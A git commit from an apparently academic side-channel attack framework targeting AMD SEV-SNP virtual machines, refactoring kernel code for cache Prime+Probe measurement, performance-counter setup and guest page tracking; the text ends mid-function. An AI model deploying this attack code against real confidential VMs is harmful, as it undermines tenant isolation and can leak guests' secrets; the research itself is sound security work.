cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP-protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit d4c8266836e9a4e6fa073667e4edfbbbb61e8666
parent da76c11f2059a8696a3df41844d49f82e6988843
Author: Louis Burda <quent.burda@gmail.com>
Date:   Wed,  5 Oct 2022 16:49:09 +0200

Sevstep and cachepc refactoring

Fold the cachepc/util.c helpers into cachepc.c and the page-tracking
helpers from sevstep/kvm.c into sevstep.c under a sevstep_ prefix.
Extend cachepc_init_pmc() with explicit host/guest and kernel/user
filter flags, carried in two new nibbles (bits 16-23) of the
CACHEPC_IOCTL_INIT_PMC argument, and update the tests accordingly
(0x000064D8 -> 0x002264D8). Also fix _perf_state_update_and_get_delta()
caching the event index instead of the counter value.

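Editor's note: the most user-visible change is the PMC filter encoding.
cachepc_init_pmc() now takes host/guest and kernel/user flags, and
cachepc_kvm_init_pmc_ioctl() (cachepc/kvm.c below) unpacks them from two
new nibbles of the 32-bit ioctl argument. A minimal userspace sketch of
that packing — pmc_ioctl_arg() is an illustrative helper, not part of
the tree:

	#include <stdint.h>

	/* Pack the CACHEPC_IOCTL_INIT_PMC argument the way
	 * cachepc_kvm_init_pmc_ioctl() below unpacks it:
	 * index | host/guest | kernel/user | event_no | event_mask */
	static uint32_t
	pmc_ioctl_arg(uint8_t index, int host, int guest, int kernel,
	              int user, uint8_t event_no, uint8_t event_mask)
	{
		uint32_t host_guest = (uint32_t) ((host << 1) | guest);   /* bits 20-23 */
		uint32_t kernel_user = (uint32_t) ((kernel << 1) | user); /* bits 16-19 */

		return ((uint32_t) index << 24) | (host_guest << 20)
			| (kernel_user << 16) | ((uint32_t) event_no << 8)
			| event_mask;
	}

For example, pmc_ioctl_arg(0, 1, 0, 1, 0, 0x64, 0xD8) yields 0x002264D8,
the host-only, kernel-only counter value the tests switch to below.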
Diffstat:
M cachepc/cachepc.c | 88 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------------------
M cachepc/cachepc.h | 4 ++--
M cachepc/kvm.c | 23 ++++++++++++++---------
D cachepc/util.c | 38 --------------------------------------
D cachepc/util.h | 8 --------
M patch.diff | 12 ++++++------
D sevstep/kvm.c | 205 -------------------------------------------------------------------------------
D sevstep/kvm.h | 4 ----
M sevstep/mmu.c | 6 +++---
M sevstep/sevstep.c | 228 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
M sevstep/sevstep.h | 18 ++++++++----------
M sevstep/uspt.c | 10 +++++-----
M test/kvm.c | 2 +-
M test/sev-es.c | 2 +-
M test/sev.c | 2 +-
15 files changed, 317 insertions(+), 333 deletions(-)

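Editor's note, for orientation while reading the first hunk below:
cachepc_init_pmc() composes an AMD PERF_CTL value and writes it to MSR
0xc0010200 + index * 2. The previously hard-coded kernel-only and
host-only bits are removed; the caller now chooses both filters. A
standalone sketch of the value it builds, mirroring that hunk
(pmc_ctl_value() is an illustrative name):

	#include <stdbool.h>
	#include <stdint.h>

	/* Compose the PERF_CTL value written by the reworked
	 * cachepc_init_pmc(); the OS/user and host/guest filters
	 * are now caller-controlled two-bit fields. */
	static uint64_t
	pmc_ctl_value(uint8_t event_no, uint8_t event_mask,
	              bool host, bool guest, bool kernel, bool user)
	{
		uint64_t event;

		event = event_no | ((uint64_t) event_mask << 8);
		event |= 1ULL << 22;                          /* enable counter */
		event |= (kernel * 2ULL + user * 1ULL) << 16; /* OS/user filter */
		event |= (host * 2ULL + guest * 1ULL) << 40;  /* host/guest filter */

		return event;
	}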
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c @@ -16,22 +16,13 @@ static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cach static cacheline **allocate_cache_ds(cache_ctx *ctx); static uint16_t get_virt_cache_set(cache_ctx *ctx, void *ptr); -void __attribute__((optimize(1))) // prevent instruction reordering -cachepc_prime_vcall(uintptr_t ret, cacheline *cl) -{ - cachepc_prime(cl); - asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); -} - -void __attribute__((optimize(1))) // prevent instruction reordering -cachepc_probe_vcall(uintptr_t ret, cacheline *cl) -{ - cachepc_probe(cl); - asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); -} +static void random_perm(uint32_t *arr, uint32_t arr_len); +static void gen_random_indices(uint32_t *arr, uint32_t arr_len); +static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len); void -cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask) +cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, + bool host, bool guest, bool kernel, bool user) { uint64_t event; uint64_t reg_addr; @@ -47,9 +38,9 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask) reg_addr = 0xc0010200 + index * 2; event = event_no | (event_mask << 8); - event |= (1ULL << 17); /* OS (kernel) events only */ event |= (1ULL << 22); /* enable performance counter */ - event |= (1ULL << 40); /* Host events only */ + event |= ((kernel * 2ULL + user * 1ULL) << 16); + event |= ((host * 2ULL + guest * 1ULL) << 40); printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X\n", index, event_no, event_mask); asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00)); @@ -149,6 +140,19 @@ cachepc_release_victim(cache_ctx *ctx, cacheline *victim) kfree(remove_cache_set(ctx, victim)); } +void * +cachepc_aligned_alloc(size_t alignment, size_t size) +{ + void *p; + + if (size % alignment != 0) + size = size - (size % alignment) + alignment; + p = kzalloc(size, GFP_KERNEL); + BUG_ON(((uintptr_t) p) % alignment != 0); + + return p; +} + void cachepc_save_msrmts(cacheline *head) { @@ -183,6 +187,19 @@ cachepc_print_msrmts(cacheline *head) } while (curr_cl != head); } +void __attribute__((optimize(1))) // prevent instruction reordering +cachepc_prime_vcall(uintptr_t ret, cacheline *cl) +{ + cachepc_prime(cl); + asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); +} + +void __attribute__((optimize(1))) // prevent instruction reordering +cachepc_probe_vcall(uintptr_t ret, cacheline *cl) +{ + cachepc_probe(cl); + asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); +} cacheline * prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) @@ -430,16 +447,39 @@ get_virt_cache_set(cache_ctx *ctx, void *ptr) return (uint16_t) ((((uintptr_t) ptr) & SET_MASK(ctx->sets)) / CACHELINE_SIZE); } -void * -cachepc_aligned_alloc(size_t alignment, size_t size) +void +random_perm(uint32_t *arr, uint32_t arr_len) { - void *p; + uint32_t i; - if (size % alignment != 0) - size = size - (size % alignment) + alignment; - p = kzalloc(size, GFP_KERNEL); - BUG_ON(((uintptr_t) p) % alignment != 0); + /* no special ordering needed when prefetcher is disabled */ + for (i = 0; i < arr_len; i++) + arr[i] = i; - return p; + // /* prevent stream prefetching by alternating access direction */ + // mid = arr_len / 2; + // for (i = 0; i < arr_len; i++) + // arr[i] = mid + (i % 2 ? 
-1 : 1) * ((i + 1) / 2); } +void +gen_random_indices(uint32_t *arr, uint32_t arr_len) +{ + uint32_t i; + + for (i = 0; i < arr_len; ++i) + arr[i] = i; + random_perm(arr, arr_len); +} + + +bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) { + uint32_t i; + + for (i = 0; i < arr_len; ++i) { + if (arr[i] == elem) + return true; + } + + return false; +} diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -2,10 +2,10 @@ #include "asm.h" #include "cache_types.h" -#include "util.h" #include "uapi.h" -void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask); +void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, + bool host, bool guest, bool kernel, bool user); cache_ctx *cachepc_get_ctx(cache_level cl); void cachepc_release_ctx(cache_ctx *ctx); diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -101,7 +101,7 @@ cachepc_kvm_prime_probe_test(void *p) arg = p; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); BUG_ON(lines == NULL); @@ -142,10 +142,10 @@ cachepc_kvm_stream_hwpf_test(void *p) arg = p; - /* TODO: accurately detect hwpf */ + /* TODO: improve detection */ /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); BUG_ON(lines == NULL); @@ -175,7 +175,7 @@ cachepc_kvm_single_access_test(void *p) uint32_t *arg; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); arg = p; @@ -209,7 +209,7 @@ cachepc_kvm_single_eviction_test(void *p) arg = p; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); WARN_ON(arg && *arg >= L1_SETS); if (arg && *arg >= L1_SETS) return; @@ -277,17 +277,22 @@ cachepc_kvm_init_pmc_ioctl(void *p) { uint32_t event; uint8_t index, event_no, event_mask; + uint8_t host_guest, kernel_user; WARN_ON(p == NULL); if (!p) return; event = *(uint32_t *)p; - index = (event & 0xFF000000) >> 24; - event_no = (event & 0x0000FF00) >> 8; - event_mask = (event & 0x000000FF) >> 0; + index = (event & 0xFF000000) >> 24; + host_guest = (event & 0x00F00000) >> 20; + kernel_user = (event & 0x000F0000) >> 16; + event_no = (event & 0x0000FF00) >> 8; + event_mask = (event & 0x000000FF) >> 0; - cachepc_init_pmc(index, event_no, event_mask); + cachepc_init_pmc(index, event_no, event_mask, + host_guest >> 1, host_guest & 1, + kernel_user >> 1, kernel_user & 1); } long diff --git a/cachepc/util.c b/cachepc/util.c @@ -1,38 +0,0 @@ -#include "util.h" - -void -random_perm(uint32_t *arr, uint32_t arr_len) -{ - uint32_t i; - - /* no special ordering needed when prefetcher is disabled */ - for (i = 0; i < arr_len; i++) - arr[i] = i; - - // /* prevent stream prefetching by alternating access direction */ - // mid = arr_len / 2; - // for (i = 0; i < arr_len; i++) - // arr[i] = mid + (i % 2 ? 
-1 : 1) * ((i + 1) / 2); -} - -void -gen_random_indices(uint32_t *arr, uint32_t arr_len) -{ - uint32_t i; - - for (i = 0; i < arr_len; ++i) - arr[i] = i; - random_perm(arr, arr_len); -} - - -bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) { - uint32_t i; - - for (i = 0; i < arr_len; ++i) { - if (arr[i] == elem) - return true; - } - - return false; -} diff --git a/cachepc/util.h b/cachepc/util.h @@ -1,8 +0,0 @@ -#pragma once - -#include <linux/kernel.h> - -void random_perm(uint32_t *arr, uint32_t arr_len); -void gen_random_indices(uint32_t *arr, uint32_t arr_len); - -bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len); diff --git a/patch.diff b/patch.diff @@ -17,7 +17,7 @@ index eb186bc57f6a..3f767a27045e 100644 /* * The notifier represented by @kvm_page_track_notifier_node is linked into diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile -index 30f244b64523..ddfd48fbd8ca 100644 +index 30f244b64523..3c5f65040878 100644 --- a/arch/x86/kvm/Makefile +++ b/arch/x86/kvm/Makefile @@ -1,6 +1,6 @@ @@ -35,8 +35,8 @@ index 30f244b64523..ddfd48fbd8ca 100644 - hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o \ - mmu/spte.o + hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \ -+ svm/cachepc/cachepc.o svm/cachepc/util.o svm/cachepc/kvm.o \ -+ sevstep/sevstep.o sevstep/uspt.o sevstep/kvm.o ++ svm/cachepc/cachepc.o svm/cachepc/kvm.o \ ++ sevstep/sevstep.o sevstep/uspt.o ifdef CONFIG_HYPERV kvm-y += kvm_onhyperv.o @@ -46,7 +46,7 @@ index 30f244b64523..ddfd48fbd8ca 100644 -kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o +kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \ -+ svm/cachepc/cachepc.o svm/cachepc/util.o ++ svm/cachepc/cachepc.o ifdef CONFIG_HYPERV kvm-amd-y += svm/svm_onhyperv.o @@ -382,14 +382,14 @@ index dfaeb47fcf2a..0626f3fdddfd 100644 2: cli diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c -index d9adf79124f9..1809b79cb6cd 100644 +index d9adf79124f9..082dc8553566 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -82,6 +82,8 @@ #include <asm/sgx.h> #include <clocksource/hyperv_timer.h> -+#include "sevstep/kvm.h" ++#include "sevstep/sevstep.h" + #define CREATE_TRACE_POINTS #include "trace.h" diff --git a/sevstep/kvm.c b/sevstep/kvm.c @@ -1,205 +0,0 @@ -#include "kvm.h" - -#include <linux/types.h> - -bool -__untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - if (mode == KVM_PAGE_TRACK_ACCESS) { - //printk("Removing gfn: %016llx from acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - //printk("Removing gfn: %016llx from write page track pool\n", gfn); - } - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - printk("Failed to untrack %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page track was not active"); - } - printk(KERN_CONT "\n"); - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__untrack_single_page); - -bool -__reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct 
kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if( slot != NULL ) { - write_lock(&vcpu->kvm->mmu_lock); - //Vincent: The kvm mmu function now requires min_level - //We want all pages to protected so we do PG_LEVEL_4K - //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm,slot,gfn,PG_LEVEL_4K,KVM_PAGE_TRACK_RESET_ACCESSED); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__reset_accessed_on_page); - -bool -__clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if( slot != NULL ) { - write_lock(&vcpu->kvm->mmu_lock); - //Vincent: The kvm mmu function now requires min_level - //We want all pages to protected so we do PG_LEVEL_4K - //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__clear_nx_on_page); - -bool -__track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - if (mode == KVM_PAGE_TRACK_ACCESS) { - //printk_ratelimited("Adding gfn: %016llx to acess page track pool\n", gfn); - //printk("Adding gfn: %016llx to acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - //printk_ratelimited("Adding gfn: %016llx to write page track pool\n", gfn); - } - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { - - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - - } else { - - printk("Failed to track %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } - if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page is already tracked"); - } - printk(KERN_CONT "\n"); - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__track_single_page); - -long -kvm_start_tracking(struct kvm_vcpu *vcpu,enum kvm_page_track_mode mode ) -{ - long count = 0; - u64 iterator, iterat_max; - struct kvm_memory_slot *slot; - int idx; - - //Vincent: Memslots interface changed into a rb tree, see - //here: https://lwn.net/Articles/856392/ - //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - //Thus we use instead of - //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - struct rb_node *node; - struct kvm_memory_slot *first_memslot; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - if ( slot != NULL && 
!kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(kvm_start_tracking); - -long -kvm_stop_tracking(struct kvm_vcpu *vcpu,enum kvm_page_track_mode mode) -{ - long count = 0; - u64 iterator, iterat_max; - struct kvm_memory_slot *slot; - int idx; - - - //Vincent: Memslots interface changed into a rb tree, see - //here: https://lwn.net/Articles/856392/ - //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - //Thus we use instead of - //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - struct rb_node *node; - struct kvm_memory_slot *first_memslot; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - //Vincent: I think see here https://patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ - if ( slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(kvm_stop_tracking); - diff --git a/sevstep/kvm.h b/sevstep/kvm.h @@ -1,4 +0,0 @@ -#pragma once - -#include "sevstep.h" -#include "uapi.h" diff --git a/sevstep/mmu.c b/sevstep/mmu.c @@ -1,7 +1,7 @@ #include "../sevstep/sevstep.h" #include "../sevstep/uspt.h" -void +static void sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault) { @@ -19,7 +19,7 @@ sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { if (kvm_slot_page_track_is_active(vcpu->kvm, fault->slot, fault->gfn, modes[i])) { - __untrack_single_page(vcpu, fault->gfn, modes[i]); + sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); was_tracked = true; } } @@ -27,7 +27,7 @@ sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, if (was_tracked) { have_rip = false; if (uspt_should_get_rip()) - have_rip = sev_step_get_rip_kvm_vcpu(vcpu,&current_rip) == 0; + have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; if (uspt_batch_tracking_in_progress()) { send_err = uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, fault->error_code, have_rip, current_rip); diff --git a/sevstep/sevstep.c b/sevstep/sevstep.c @@ -13,7 +13,6 @@ #include "cpuid.h" #include "mmu/spte.h" - #include <linux/kvm_host.h> #include <linux/types.h> #include <linux/string.h> @@ -44,12 +43,7 @@ struct kvm* main_vm; EXPORT_SYMBOL(main_vm); -// used to store performance counter values; 6 counters, 2 readings per counter -// TODO: static! 
-uint64_t perf_reads[6][2]; -perf_ctl_config_t perf_configs[6]; -int perf_cpu; - +static perf_ctl_config_t perf_configs[6]; uint64_t perf_ctl_to_u64(perf_ctl_config_t * config) @@ -60,10 +54,10 @@ perf_ctl_to_u64(perf_ctl_config_t * config) result |= config->EventSelect & 0xffULL; result |= (config->UintMask & 0xffULL) << 8; result |= (config->OsUserMode & 0x3ULL) << 16; - result |= (config->Edge & 0x1ULL ) << 18; - result |= (config->Int & 0x1ULL ) << 20; - result |= (config->En & 0x1ULL ) << 22; - result |= (config->Inv & 0x1ULL ) << 23; + result |= (config->Edge & 0x1ULL) << 18; + result |= (config->Int & 0x1ULL) << 20; + result |= (config->En & 0x1ULL) << 22; + result |= (config->Inv & 0x1ULL) << 23; result |= (config->CntMask & 0xffULL) << 24; result |= ((config->EventSelect & 0xf00ULL) >> 8) << 32; result |= (config->HostGuestOnly & 0x3ULL) << 40; @@ -88,8 +82,9 @@ read_ctr(uint64_t ctr_msr, int cpu, uint64_t* result) } void -setup_perfs() +sevstep_setup_pmcs(void) { + int perf_cpu; int i; perf_cpu = smp_processor_id(); @@ -107,7 +102,7 @@ setup_perfs() perf_configs[0].EventSelect = 0x0c0; perf_configs[0].UintMask = 0x0; perf_configs[0].En = 0x1; - write_ctl(&perf_configs[0],perf_cpu, CTL_MSR_0); + write_ctl(&perf_configs[0], perf_cpu, CTL_MSR_0); /* * programm l2d hit from data cache miss perf for @@ -118,12 +113,213 @@ setup_perfs() perf_configs[1].UintMask = 0x70; perf_configs[1].En = 0x1; perf_configs[1].HostGuestOnly = 0x2; /* count only host events */ - write_ctl(&perf_configs[1],perf_cpu,CTL_MSR_1); + write_ctl(&perf_configs[1], perf_cpu, CTL_MSR_1); +} +EXPORT_SYMBOL(sevstep_setup_pmcs); + +bool +sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + if (mode == KVM_PAGE_TRACK_ACCESS) { + //printk("Removing gfn: %016llx from acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + //printk("Removing gfn: %016llx from write page track pool\n", gfn); + } + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + printk("Failed to untrack %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page track was not active"); + } + printk(KERN_CONT "\n"); + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_untrack_single_page); + +bool +sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if( slot != NULL ) { + write_lock(&vcpu->kvm->mmu_lock); + //Vincent: The kvm mmu function now requires min_level + //We want all pages to protected so we do PG_LEVEL_4K + //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm,slot,gfn,PG_LEVEL_4K,KVM_PAGE_TRACK_RESET_ACCESSED); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_reset_accessed_on_page); + +bool +sevstep_clear_nx_on_page(struct 
kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if( slot != NULL ) { + write_lock(&vcpu->kvm->mmu_lock); + //Vincent: The kvm mmu function now requires min_level + //We want all pages to protected so we do PG_LEVEL_4K + //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_clear_nx_on_page); + +bool +sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + if (mode == KVM_PAGE_TRACK_ACCESS) { + //printk_ratelimited("Adding gfn: %016llx to acess page track pool\n", gfn); + //printk("Adding gfn: %016llx to acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + //printk_ratelimited("Adding gfn: %016llx to write page track pool\n", gfn); + } + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { + + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + + } else { + + printk("Failed to track %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } + if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page is already tracked"); + } + printk(KERN_CONT "\n"); + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_track_single_page); + +long +sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + long count = 0; + u64 iterator, iterat_max; + struct kvm_memory_slot *slot; + int idx; + + //Vincent: Memslots interface changed into a rb tree, see + //here: https://lwn.net/Articles/856392/ + //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + //Thus we use instead of + //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + struct rb_node *node; + struct kvm_memory_slot *first_memslot; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator = 0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_start_tracking); + +long +sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + long count = 0; + u64 iterator, iterat_max; + struct kvm_memory_slot *slot; + int idx; + + + //Vincent: Memslots interface changed into a rb tree, see + //here: https://lwn.net/Articles/856392/ + //and here: 
